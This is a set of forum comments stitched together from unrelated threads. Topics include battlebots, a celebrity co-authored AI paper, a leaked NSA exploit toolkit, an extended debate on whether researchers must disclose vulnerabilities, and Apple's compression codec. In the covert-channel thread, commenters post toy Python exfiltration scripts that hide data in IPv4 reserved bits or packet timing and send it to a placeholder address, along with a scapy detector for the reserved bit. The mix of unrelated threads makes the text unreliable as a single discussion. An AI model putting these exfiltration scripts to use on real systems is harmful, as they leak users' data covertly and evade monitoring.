It would be great if phone makers committed to something like this as part of their environmental plans.


Who wouldn't love race car battlebots?


Exactly. As the article says, it wouldn't be about the accomplishments of the driver and his/her reflexes and abilities; it would be all about the engineering team, AI, and tech behind the vehicle! It would be fantastic! But I can see how it wouldn't really fit into "NASCAR"; it would be more of a sport of its own - like you said, battlebots.


I'd rather see Demolition Derby battlebots.

Heck, I miss the original BattleBots for that matter.


No, they actually did write parts of the paper.

Leaving them out as co-authors would be misconduct.


Source?


The paper is about how to iteratively tweak your rendering pipeline to achieve a certain look. It makes sense that the director of the movie would be involved in that process.


If I tell someone to blur a background during postprocessing, do I also get a co-author credit on a paper about Gaussian photo manipulation?


If the particular blur in question has a unique characteristic, you should push for it, sure.


So, you didn't read the paper, huh?


I did. They describe using a Keras implementation of style transfer - written by someone else, of a technique invented by someone else - to achieve a particular artistic effect. They use a pre-trained model. They didn't even have to buy any hardware, since they used AWS GPU instances. It's a case study; nothing new has been accomplished here.
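
To give a sense of how off-the-shelf this is, here's roughly what the core of that setup looks like (a minimal sketch, assuming TensorFlow's bundled Keras and the usual Gatys-style layer choices, which may not be exactly what the paper used):

  # Minimal sketch of vanilla neural style transfer's core: a pretrained VGG19
  # plus Gram-matrix "style" features. Layer names are the standard choices,
  # not necessarily the paper's.
  import tensorflow as tf
  from tensorflow.keras.applications import vgg19

  STYLE_LAYERS = ["block1_conv1", "block2_conv1", "block3_conv1",
                  "block4_conv1", "block5_conv1"]

  base = vgg19.VGG19(weights="imagenet", include_top=False)
  extractor = tf.keras.Model(base.input,
                             [base.get_layer(n).output for n in STYLE_LAYERS])

  def gram_matrix(feats):
      # Channel-by-channel feature correlations: the "style" representation.
      g = tf.linalg.einsum("bijc,bijd->bcd", feats, feats)
      n = tf.cast(tf.shape(feats)[1] * tf.shape(feats)[2], tf.float32)
      return g / n

  def style_features(image):  # image: float32 tensor in [0, 1], shape (1, H, W, 3)
      x = vgg19.preprocess_input(image * 255.0)
      return [gram_matrix(f) for f in extractor(x)]

The full transfer is then just gradient descent on the output image to minimize the distance between these features (plus a content term).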

Do I also get a Verge writeup if I publish a PDF to arXiv about how I compiled and installed TensorFlow? The only reason we're talking about this paper is because the name of a Hollywood actress is on it, and because it has the AI buzzword.

Look at the title: "Kristen Stewart co-authors AI paper". 113 points.

The paper itself was submitted earlier, under its actual title, which does not mention Kristen Stewart: https://news.ycombinator.com/item?id=13443107 (6 points!). The paper is not very interesting. The only thing that makes it newsworthy is the coauthor.


Is any arXiv preprint more untrustworthy than any other, or something? [I mean, it's not viXra...]

I can't help but think it would be degrading to have your name on a paper and have it deemed too advanced to be your responsibility...

You could ask the first author directly, I suppose: https://twitter.com/bhautikj


My question was directed at "salem", who stated "No, they actually did write parts of the paper." That statement seemed like it should have reasoning behind it...


My source?

I would ask: what is the source of that quote? The article no longer contains it.


So it seems the dump contains at least one legit 0-day, and it's been in use for 3 years.


Which does at least HINT that it might be what it claims to be. That's a pretty impressive 0-day which they just gave away as a freebie; who knows what they didn't give away.

I will say we'll never get real confirmation of whether this was actually stolen from the NSA, but if the other bundle contains a bunch of nice original vulnerabilities, people will presume it was.


The Washington Post got former NSA TAO employees to go on record (anonymously) confirming that the leaked toolkit comes from the NSA:

https://www.washingtonpost.com/world/national-security/power...


Good. Given that these tools can no longer be considered available only to the NSA, they might start working with vendors to close this particular set of holes.


I wonder how this leak affects their "vulnerabilities equities process".

The publicly available data would suggest that vulnerabilities the NSA has hoarded thus far are definitively known to actors who appear willing to act against US interests.

Vendor disclosure means those vulnerabilities can be patched and US interests can cease being vulnerable, but it could also confirm NSA awareness of the vulnerabilities - which could in turn cause attribution concerns for past or present operations the NSA has undertaken, or is undertaking, using them (in addition to lending further credibility to the leaker).

What a tangled web.


I've worked with the US govt (selling to it), and I can tell by browsing those files that there is a high chance this came from a three-letter US govt agency - just by looking at the stuff they reference, the packages and tools they use, and the language and phraseology in the comments (excluding bundled software like requests and scapy, of course). After many years you start to get a feel for stuff like that.


Yes, I think so, too.


Makes you wonder if they could have made more money by pretending to find them and reporting them to the respective bug bounty programs.


Bug bounties almost never pay market value for exploits. Only reason to participate in them is charity.


And legality. I'm not sure why people seem to entirely discount that portion. There's more reward by selling on the black market, but there's also more risk associated with that.


Yeah. Homeowners don't pay market value for me not robbing them, either. After all, think how much that jewellery is worth, and the damage from stolen ID cards and passports.

A laptop alone could get me $250, but no one wants to give me even $10 for telling them their door is unlocked.


Most people only care about tangibles. When I politely advised them about security holes, I was told "we don't need people like you" or they just called the police. I understand.


They discount it because it's not true. Nothing illegal about looking for vulnerabilities in products and being compensated for your findings. It's only illegal to attack someone else's deployment.


What's illegal about selling them? Is there an anti-security-consulting-market legislation?

In general, what are some of the risks involved? (I am just not very familiar with this and wondering in general.) Is it a tax issue - the chance the IRS could come after you for undeclared income?


Depending on jurisdiction and the particulars of the sale and who you sold it to, I think it's possible you could be charged as an accomplice if the exploit is used in a crime. For example, if you had any reason to believe the individual or organisation you sold it to might use it illegally, and someone singles you out after they do use it illegally, I don't think it would be hard for a prosecutor to make a case. I also don't think under those particular circumstances that's necessarily a bad thing. IANAL though.


Nothing; there are businesses doing it in the US and paying taxes on their income.


> Only reason to participate in them is charity.

Maybe believing that it's good when fewer vulnerabilities exist and when attackers are less able to exploit things? Does that count as charity?


...noun: the voluntary giving of help to those in need.


Getting a CVE on your resume isn't bad either.


> and it's been in use for 3 years.

At least 3 years.


This is why "responsible disclosure" is a joke. The flaws put in by these companies are not responsible. (Sometimes people make mistakes, but we're at the point of carelessness).


That may feel good to say, but as someone whose job it was to find these kinds of bugs in software from companies ranging from tiny startups to financial exchanges to major tech vendors, this is a kind of carelessness shared by virtually everyone shipping any kind of software anywhere.

That said, the term "responsible disclosure" is Orwellian, and you should very much avoid using it.


How is "responsible disclosure" Orwellian?


It's coercive. It redefines language to make any handling of vulnerabilities not condoned by the vendors who shipped those vulnerabilities "irresponsible", despite the fact that third parties who discover vulnerabilities have no formal duty to cooperate with those vendors whatsoever.

The better term is "coordinated disclosure". But uncoordinated disclosure is not intrinsically irresponsible. For instance: if you know there's an exploit in the wild for something, perhaps go ahead and tweet the vulnerability without notice!


Do you think there's a moral imperative for researchers to responsibly disclose discovered vulnerabilities?

I see it as a kind of Hippocratic Oath in the field.


No.


Maybe I don't understand you. Are you suggesting that, if you find a vulnerability in a piece of software, you aren't ethically obligated to confidentially disclose the vulnerability to the maintainer so it can be patched before the vulnerability becomes publicly known? If so, why? What is a person who found a vulnerability ethically obligated to do?


No, of course you aren't. Why would you be?


... because if you don't and someone malicious also discovers this vulnerability they can use it to do bad things? If I can get a vulnerability patched before it can be exploited, I can potentially prevent a hacker from stealing people's identity, credit card numbers, private data, etc. To have that opportunity and not act seems irresponsible.

I must be misunderstanding. Would you mind expanding on this more?


You are not misunderstanding. I do not in the general case have a duty to correct other people's mistakes. The people deploying broken software have a duty to do whatever they can not to allow its flaws to compromise their users and customers. Merely learning something new about the software they use does not transfer that obligation onto me.

I would personally in almost every case report vulnerabilities I discovered. But not in every case (for instance: I refused to report the last CryptoCat flaw I discovered, though I did publicly and repeatedly warn that I'd found something grave). More importantly: my own inclination to report doesn't bind on every other vulnerability researcher.


Well, I'm glad you do report the vulnerabilities you find. Maybe it's my own naive, optimistic worldview, but I profoundly disagree with your stance that a researcher is not obligated to report. I think it is a matter of public safety. If you found out a particular restaurant was selling food with dangerously high levels of lead, aren't you obligated to tell someone, anyone for the public good? If you don't, you aren't as culpable as the restaurant serving this food, but that's still a lot of damage you could have prevented at no real cost to yourself.

I understand morality is subjective, but that's my 2 cents on the matter.

EDIT: about the vulnerabilities you didn't disclose, I really can't understand why not. Why not just send an email to the maintainer: "hey, when I do X I cause a buffer overflow"? You don't even have to help them fix it. You probably won't answer this, but can you tell me why you wouldn't disclose a vulnerability?


I do not report all the vulnerabilities I find, as I just said.

I confess to being a bit mystified as to how work I do on my own time, uncompensated by anyone else, which work does not create new vulnerabilities but instead merely informs me as to their existence, somehow creates an obligation for me to act on behalf of the vendors who managed to create those vulnerabilities in the first place.

Perhaps you have not had the pleasure of trying to report a vulnerability, losing several hours just trying to find the correct place to send the vulnerability, being completely unable to find a channel with which to send the vulnerability without putting the plaintext for it on the Internet in email or some dopey web form, only to get a response from first-line tech support asking for a license or serial number so they can provide customer support.

Clearly, you have not had the experience of being threatened with lawsuits for reporting vulnerabilities --- not in software running on someone else's servers (which, absent a bug bounty, you do not in the US have a legal right to test) but on software you download and run and test on your own machine. I have had that experience.

No. Finding vulnerabilities does not obligate someone to report them. I can understand why you wish it did. But it does not.


I see your point about it being overly difficult to report vulnerabilities, especially the legal threats - that seriously sucks. I guess I believe you have an obligation to make some effort to disclose, but if a project is just irresponsible and won't fix their shit, or will try to sue you, it's out of your hands.


Somehow my doing work on my own time creates an obligation for me to do more work on behalf of others.

Can't I just flip this around on you and say you have an ethical obligation to spend some of your time looking for vulnerabilities? If you started looking, you'd find some. Why do you get to free-ride on my work by refusing to scrutinize the stuff you run?


> Somehow my doing work on my own time creates an obligation for me to do more work on behalf of others.

To some small extent, yes, though how much work is up for debate. Maintainer's email and PGP public key are right there on the website? Yeah, I think you're obligated. No email you can find, no way to contact them, or they're just outright hostile? No, I think you shouldn't have to deal with that.

But I feel like you agree with that, though maybe not in those exact words. After all, you've had to jump through all kinds of hoops to disclose vulnerabilities, been threatened with lawsuits for doing the right thing, and yet you still practice responsible disclosure in almost every case in spite of the burden of effort and potential risk. Aren't you doing it because you think disclosure is the right thing to do? That's all I mean by obligation.

EDIT: sorry, not "responsible disclosure," "cooperative disclosure" or whatever term you want to use for disclosing the vulnerability to the maintainer.


I think it is a matter of degree. Here - not sure how this is handled in other countries - it is a crime if you come across an accident and do not attempt to help. And to me this is obviously not only the right thing to do because it is required by law but because there is a moral obligation to do so.

Nobody has to enter a burning car and risk his life but at least you have to call the emergency service or do whatever you can reasonably do to help. And it really doesn't matter whether you are doing your work delivering packages, whether the accident was the fault of the driver because he was driving intoxicated, if somebody else could also help or whatnot.

Discovering a vulnerability is of course different in most respects - the danger is less imminent, the vendor may have a larger responsibility, and so on. But the basic structure is the same - more or less by accident you end up in a situation where there is a danger and you are in a position to help make the outcome probably better.

So I think one cannot simply dismiss, based just on the structure of the situation, the possibility that there is a moral obligation to disclose a vulnerability to the vendor; one has to either argue that there is also no moral obligation in the accident scenario, or argue that the details are sufficiently different that a different action - or no action in this specific case - is the morally correct, or at least a morally acceptable, action.


Accidents and vulnerabilities are not directly comparable, so a position on vuln disclosure does not necessarily imply a particular position on accident assistance.

I would feel a moral obligation to help mitigate concrete physical harm to victims of an accident. I feel no such obligation to protect against hypothetical threats to computer systems.

Chances are, you recognize similar distinctions; for instance, I doubt you feel obligated to intervene in accidents that pose only minor personal property risks.


That is also my point of view: severity and other factors matter. But that also seems to imply the same thing for vulnerabilities - discovering a remote code execution vulnerability in Windows might warrant a different action than a hidden master password in an obscure piece of forum software no one has really used in a decade. The danger is still more abstract, but it can still cause real harm to real people.


I would personally disclose RCE in Windows, not least because I think Microsoft does a better-than-average job in dealing with the research community.

But I need to be careful saying things like that, because it is very easy for me to say that, because I don't spend any time looking for those kinds of flaws. Security research is pretty specialized now, and I don't do spare-time Windows work. I might feel differently if I did.

I would not judge the (many) researchers who would not necessarily disclose that flaw immediately.


IF there is a vulnerability, it might already be in use by hackers. People need to know about it immediately, so they can defend themselves (by closing a port, or switching to a different server or something). Companies need to be encouraged to find and fix this kind of thing without waiting for someone else to embarrass them by finding it.


I object strongly to your claim that I practice "responsible disclosure", for the reasons stated earlier in the thread.


There is no such thing as responsible disclosure. The concept is nonsensical. Also, you're overestimating the consequences of a single bug. The boring reality is that bugs rarely matter.


When you say obligation, do you actually mean that? An obligation is enforced by some sort of penalty, either legal (ultimately a threat of violence) or social (public shaming). There is no incentive for meeting an obligation outside of avoiding punishment, so why would individuals and private enterprises do any infosec work?


You assume that your own research machine can't be compromised, and that the communication channels of the organization at fault can't be either.

So, it won't be fixed.

Hopefully only one or two people know about the same flaw you found...

Oh, but you would know ahead of time if concrete physical harm could possibly come to the victim of an accident?

Well good for you! You should probably be in charge of defending all infosec research, since apparently you can't be hacked.


[flagged]


Then you misunderstood your own logical conclusion...

You said (and I quote):

  Can't I just flip this around on you and say
  you have an ethical obligation to spend some
  of your time looking for vulnerabilities?
No. No, you can't. Unless you could convince me that my Dwarf Fortress skills have a similar magnitude of real-world effect as the vulnerabilities I've discovered on my own and decided to pocket for one reason or another.


By your logic, I am better off not doing vulnerability research in my spare time --- as is virtually everybody else. How is that a good outcome?


No. By my logic, you are better off not doing vulnerability research in your spare time if you have to worry about the legal ramifications of your actions.

The ethical conundrums are unavoidable, and those calculations are indeed difficult.

The legal consequences are artifice, and by agreeing to those (while ignoring externalities and not going public), you are likely putting others at risk.


This is a fascinating exchange. Now I wonder how much of the general population, or even the tech-but-not-security population thinks like this.


To your second question: because some projects are fundamentally irresponsible, and providing vulnerability reports to them means making an engineering contribution, which decreases the likelihood that the project will fail.


The meaning of the words "responsible" and "irresponsible" extends beyond "formal duty".


I'm sure that's true, but that's not responsive to my argument.


I obviously thought so otherwise I wouldn't have said it.


The only responsive argument I can come up with based on your original comment depends on you not knowing what the term "responsible disclosure" means, and instead trying to back out its meaning from the individual words "responsible" and "disclosure". But that's not what the term means.

A good shorthand definition for "responsible disclosure" is "report to the vendor, and only to the vendor, and disclose to nobody else until the vendor chooses to release a patch, and even then not until a window of time chosen by the vendor elapses."

Maybe you thought I was saying "the only way to disclose responsibly is to honor a formal duty to the vendors of insecure software". No, that was not my argument. If you thought it was, well, that's a pretty great demonstration of how the term is Orwellian, isn't it?

Or I could be missing part of your argument (it was quite terse, after all). Maybe you could fill in some details.


> this is a kind of carelessness shared by virtually everyone shipping any kind of software anywhere.

I don't feel wrong saying that all of those are irresponsible. There are some people who write good code, who at least make an effort to avoid vulnerabilities, and those are the responsible ones.


If you find one of them in the wild, take a picture, so we can have some evidence they exist.


They exist all over the place: OpenBSD, DJB, Knuth, and at companies I've worked for - you'll find people who care and code responsibly. The rest of you need to get your act together.


Someone mentioned selling vulnerabilities on the black market as a better alternative than doing these "responsible disclosure" and bug bounties. What's your take on that? Is it a better route to take?


For the most part I think selling vulnerabilities on an actual "black market" is intrinsically unethical, and makes you a party to the bad things people who buy exploits on an actual black market do with them.

Thankfully, the black market doesn't want 99.99999% of the vulnerabilities people find.

I have friends who have sold vulnerabilities to people other than vendors. I do not think they're unethical people, and I don't know enough about those transactions to really judge them. So, it really depends, I guess. But if it were me, I'd be very careful.


It's dangerous, and might be illegal, so be careful if you decide to do that.


Companies that make Bluetooth OBD2 devices and smartphone apps should pay attention to this too.


There were loads of DEC Multia workstations selling cheap at some point. But even those were a pain to get booting into Linux or FreeBSD.


There was an Apple presentation that claimed lower decompression energy usage:

https://developer.apple.com/videos/play/wwdc2015/712/?time=4...

On an iOS device this is a pretty hot path, since it's used to decompress the asset catalog, including some images, so most of your apps on iOS probably already use this algorithm.
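
If the codec in question is LZFSE (an assumption on my part), you can play with the same codec on a Mac through Apple's libcompression. A rough ctypes sketch; the dylib path and the 0x801 constant come from macOS's <compression.h>:

  # Rough sketch: round-tripping a buffer through LZFSE via Apple's
  # libcompression from Python/ctypes on macOS.
  import ctypes

  lib = ctypes.CDLL("/usr/lib/libcompression.dylib")
  SIG = [ctypes.c_char_p, ctypes.c_size_t,   # dst buffer, dst capacity
         ctypes.c_char_p, ctypes.c_size_t,   # src buffer, src size
         ctypes.c_void_p, ctypes.c_int]      # scratch (NULL = allocate), algorithm
  for fn in (lib.compression_encode_buffer, lib.compression_decode_buffer):
      fn.restype, fn.argtypes = ctypes.c_size_t, SIG

  COMPRESSION_LZFSE = 0x801
  payload = b"pretend this is an asset catalog " * 400

  dst = ctypes.create_string_buffer(len(payload))
  n = lib.compression_encode_buffer(dst, len(dst), payload, len(payload),
                                    None, COMPRESSION_LZFSE)
  out = ctypes.create_string_buffer(len(payload))
  m = lib.compression_decode_buffer(out, len(out), dst.raw[:n], n,
                                    None, COMPRESSION_LZFSE)
  assert out.raw[:m] == payload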


It's called a covert channel. It could be done by flipping some unused/ignored bits in IPv4/TCP headers in a stream of traffic that goes past a collection point.
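
For illustration, here's what the simplest version of that looks like with scapy - a toy sketch, nothing from any real dump; the choice of the IPv4 reserved flag and the destination address are just examples, and sending raw packets needs root:

  # Toy covert channel: one bit per packet, carried in the IPv4 reserved flag
  # (value 4 in the 3-bit flags field). Normal receivers ignore it; a listener
  # at a collection point that knows to look for it can reassemble the stream.
  from scapy.all import IP, TCP, send

  def send_covert(dst, data):
      bits = [(byte >> i) & 1 for byte in data for i in range(7, -1, -1)]
      for bit in bits:
          pkt = IP(dst=dst, flags=4 if bit else 0) / TCP(dport=80, flags="S")
          send(pkt, verbose=False)

  # send_covert("192.0.2.10", b"hi")  # 192.0.2.0/24 is TEST-NET, for examples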


But this is still easily visible with Wireshark, right? Don't you think we'd have discovered this by now?


How would Wireshark reveal this kind of attack? If the management chip has direct hardware access, it can hide data in innocuous-looking packets that the host machine never sees. You would have to monitor both the packets that the OS thinks it's sending, and the packets actually received by the switch, and constantly compare them for mismatches. Given the performance cost, I find it hard to believe that anyone except the most paranoid organizations would actually do this.

And of course, if you block the obvious exfiltration methods, all you do is force the attacker to do something more creative. Like modulating inter-packet timings, or even sending data to a nearby radio receiver by using the system bus as an antenna.


> How would Wireshark reveal this kind of attack? If the management chip has direct hardware access, it can hide data in innocuous-looking packets that the host machine never sees.

Lots of organizations use various forms of intrusion detection. A network intrusion detection system (NIDS) would be an off-device system which monitors network traffic for suspicious or obviously malicious packets.

It's certainly no guarantee, but somewhere along the line someone probably would have noticed something if these systems were exfiltrating data via the network using something like IPv4 headers. In fact, a quick look suggests that Snort (an open-source NIDS) may actually be distributed with rules that alert on IPv4 reserved bits being set.
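
For what it's worth, the check itself is trivial. Here's a sketch of what such a rule amounts to, written with scapy rather than Snort's rule language (sniffing needs root, and the default interface is assumed):

  # Flag any IPv4 packet with the reserved bit set - it shouldn't appear in
  # normal traffic, which is exactly why it's attractive as a covert channel
  # and easy to write a NIDS rule for.
  from scapy.all import sniff, IP

  def flag_reserved_bit(pkt):
      if IP in pkt and int(pkt[IP].flags) & 0x04:
          print("reserved bit set: %s -> %s" % (pkt[IP].src, pkt[IP].dst))

  sniff(prn=flag_reserved_bit, store=False)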


You keep saying that "someone should have noticed something", but as the old adage goes, absence of evidence is not evidence of absence.

What you seem to keep missing is that we know from the Snowden leaks that the capability already exists, and the NSA has successfully used implants to do data exfiltration in the past.


"absence of evidence is not evidence of absence"

This isn't true. Absence of evidence is weak evidence of absence, and suggests that it's not the case.

Not disagreeing with anything else in your comment, but that quote completely defies Bayes 101.


There are ways of doing it invisibly: change timestamps in very subtle ways, embed data in lossy media formats, etc.

If the code says "phone home if anywhere on the screen you see one of the following email addresses", then it won't show up in a normal security audit unless you email one of those people during the audit. All the NSA has to do is make the phoning home rare enough that it's probabilistically unlikely to be observed.


Exfiltration of logged keystrokes and other data is possible by having the ME introduce network packet jitter. This is virtually undetectable.

https://events.ccc.de/congress/2013/Fahrplan/events/5380.htm...
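
To make the idea concrete, here's a toy sketch of a timing channel - nothing to do with the actual ME implant in the talk; the host, port, and delay values are made up. The packet contents stay innocuous, and the data rides entirely on the inter-packet delay.

  # Encode bits as added jitter between otherwise boring packets. A receiver
  # (or a passive collector on the path) recovers the bits from the timing.
  import socket, time

  DELAYS = {0: 0.05, 1: 0.15}  # seconds of jitter per bit (illustrative)

  def leak(data, host="192.0.2.10", port=53):
      s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
      bits = [(b >> i) & 1 for b in data for i in range(7, -1, -1)]
      for bit in bits:
          s.sendto(b"\x00", (host, port))  # payload is meaningless
          time.sleep(DELAYS[bit])          # the information is in the timing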


But maybe there's a better chance of getting away with it.


These side-letter deals and exits optimized for founders are probably not legal since they are often not in the best interests of shareholders, but I've never heard of them being investigated.

